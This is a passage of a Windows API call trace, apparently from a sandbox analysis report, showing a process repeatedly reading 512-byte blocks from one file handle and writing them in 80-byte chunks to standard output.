lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] 
GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 
[0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.605] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.605] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.606] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.606] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType 
(hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.607] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.607] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.607] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, 
lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.609] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.609] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 
[0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.610] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.610] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.611] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.611] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, 
lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 
| out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.613] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.613] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle 
